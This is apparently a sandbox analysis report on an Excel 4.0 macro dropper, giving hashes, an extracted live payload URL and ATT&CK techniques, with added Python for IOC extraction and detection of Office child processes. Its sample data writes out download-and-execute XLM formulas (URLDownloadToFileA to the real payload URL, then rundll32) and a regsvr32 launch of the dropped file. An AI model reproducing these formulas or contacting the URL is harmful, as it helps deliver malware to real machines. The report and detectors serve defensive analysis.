General

  • Target

    doc (16).zip

  • Size

    15KB

  • Sample

    210224-v7r9p32xva

  • MD5

    435fd48b1d938717ae2bd3f7bbd45a69

  • SHA1

    72a1f3c743033304bccd11503914521ae5f6662b

  • SHA256

    b08dccba7b50a181160d47d504146388142a223d21bcfb84f9d26c2b964f374f

  • SHA512

    9ac96b6e43b1bef4e4eafcce5f95699fe58d0bd480fdd5ecb507d3ab334c46c3d85d96392c42c5cc3ac67c6451e1f44db0757f081bd82c23f899b1fcc548ef13

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0 (Excel 4.0 / XLM macro)

  • Source

    xlm40.dropper

  • URLs

    http://45.11.183.181/22.gif
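The config above was extracted from Excel 4.0 (XLM) macro formulas, which typically download a payload and hand it to a system binary. The following is an added example, not part of the report or the sandbox's own extractor: it pulls URLs, Windows paths, CALL/EXEC targets out of deobfuscated XLM formula text and defangs the URL for a ticket. The sample formulas are constructed for this example; only the URL comes from the report, and the urlmon API call, drop path and rundll32 command are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample of what a deobfuscated Excel 4.0 (XLM) dropper sheet could look
# like. Only the URL comes from the report; the urlmon API call, the drop path and
# the EXEC command are assumptions made for this example.
SAMPLE_XLM_FORMULAS = [
    '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
    '"http://45.11.183.181/22.gif","C:\\Users\\Public\\drop.dll",0,0)',
    '=EXEC("rundll32.exe C:\\Users\\Public\\drop.dll,DllRegisterServer")',
    '=HALT()',
]

URL_RE = re.compile(r'https?://[^\s"\')]+', re.IGNORECASE)
CALL_RE = re.compile(r'=CALL\("([^"]+)"\s*,\s*"([^"]+)"', re.IGNORECASE)
EXEC_RE = re.compile(r'=EXEC\("([^"]+)"\)', re.IGNORECASE)
WINPATH_RE = re.compile(r'[A-Za-z]:\\[^",)]+')

# (dll, export) pairs that mean "download" or "execute" when seen in an XLM CALL().
DOWNLOAD_EXEC_APIS = {
    ("urlmon", "urldownloadtofilea"),
    ("urlmon", "urldownloadtofilew"),
    ("shell32", "shellexecutea"),
    ("kernel32", "createprocessa"),
}


def defang(url: str) -> str:
    """Make a URL safe to paste: hxxp scheme and bracketed dots in the host only."""
    p = urlparse(url)
    scheme = "hxxps" if p.scheme.lower() == "https" else "hxxp"
    host = p.netloc.replace(".", "[.]")
    return f"{scheme}://{host}{p.path}"


def _dedupe(items):
    """Drop duplicates while keeping first-seen order."""
    seen, out = set(), []
    for it in items:
        if it not in seen:
            seen.add(it)
            out.append(it)
    return out


def extract_iocs(formulas):
    """Pull network, file and execution indicators out of XLM formula text."""
    urls, calls, execs, paths = [], [], [], []
    for f in formulas:
        urls.extend(URL_RE.findall(f))
        m = CALL_RE.search(f)
        if m:
            calls.append((m.group(1), m.group(2)))
        m = EXEC_RE.search(f)
        if m:
            execs.append(m.group(1))
        paths.extend(WINPATH_RE.findall(f))
    urls, calls, execs, paths = map(_dedupe, (urls, calls, execs, paths))
    flagged = [c for c in calls if (c[0].lower(), c[1].lower()) in DOWNLOAD_EXEC_APIS]
    return {
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "api_calls": calls,
        "download_or_exec_apis": flagged,
        "exec": execs,
        "dropped_paths": paths,
        # A sheet that fetches something and then runs or registers it is a dropper.
        "is_dropper": bool(urls and (flagged or execs)),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_XLM_FORMULAS).items():
        print(f"{key}: {value}")
```

Real sheets hide the formula text behind CHAR()/FORMULA() chains and hidden sheets, so this runs on the output of a deobfuscation pass (for example the emulated formulas that tools such as oletools' olevba or XLMMacroDeobfuscator produce), not on the raw .xls.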

Targets

    • Target

      document-197066197.xls

    • Size

      90KB

    • MD5

      b1b373079e3ce83ccea85c2c6c50f10c

    • SHA1

      9917e63c334dd1d81182631a5776c922f797d2f3

    • SHA256

      edfb3775902364ce01d274c0203c78d849f2cfdd07e05bd165649288f7185e1c

    • SHA512

      31c9702a7825c27b38422543fe97ff41ffbdf1442b8b0cba62c61f28aac87428047a5efd6ca9ca5540d88c5dd5fdeff3e9cc7db12a8f34219216a0f484ce64cc

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
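The signature above fires when an Office process has a child it should not have. As an added example (not the sandbox's own signature logic), here is the same check written over a constructed process-event list: it walks the parent chain so that grandchildren of EXCEL.EXE are caught as well, skips the helper processes Office spawns legitimately, and ranks children that are common living-off-the-land binaries higher. The event list, the regsvr32 command line and the file path in it are assumptions for this example and do not come from the report.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children Office legitimately spawns (print helper, crash reporter); anything else
# under an Office process is reported.
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe", "dwwin.exe"}
# Binaries macro droppers usually hand off to; used to rank severity.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "cmd.exe", "powershell.exe",
           "wscript.exe", "cscript.exe", "certutil.exe", "msiexec.exe"}

# Constructed sample events (not from the report): a benign print-helper spawn and a
# dropper-style chain. The regsvr32 command line and its path are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(1234, 400, "EXCEL.EXE",
              '"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" document-197066197.xls'),
    ProcEvent(1300, 1234, "splwow64.exe", "splwow64.exe 12288"),
    ProcEvent(1500, 1234, "regsvr32.exe", "regsvr32.exe -s C:\\Users\\Public\\22.gif"),
    ProcEvent(1600, 1500, "cmd.exe", "cmd.exe /c whoami"),
]


def office_ancestor(proc, by_pid, max_depth=16):
    """Walk up the parent chain and return the nearest Office ancestor, or None.

    max_depth guards against cycles or self-parented records in bad telemetry.
    """
    cur = proc
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None or parent.pid == cur.pid:
            return None
        if parent.image.lower() in OFFICE_APPS:
            return parent
        cur = parent
    return None


def find_unexpected_children(events):
    """Return one finding per process that descends from an Office app and is not expected."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        image = e.image.lower()
        if image in OFFICE_APPS or image in EXPECTED_CHILDREN:
            continue
        root = office_ancestor(e, by_pid)
        if root is None:
            continue
        parent = by_pid[e.ppid]          # safe: office_ancestor found it
        findings.append({
            "parent": parent.image,
            "child": e.image,
            "cmdline": e.cmdline,
            "office_root": root.image,
            "direct": parent.pid == root.pid,     # False for grandchildren
            "severity": "high" if image in LOLBINS else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_unexpected_children(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['office_root']} -> {f['parent']} -> {f['child']}: {f['cmdline']}")
```

On real endpoint telemetry (Sysmon event 1 or an EDR process-create stream) the same logic applies; the allowlist is the part to tune per environment, since add-ins and printer drivers add a few legitimate children.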

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 2

    System Information Discovery (T1082): 2
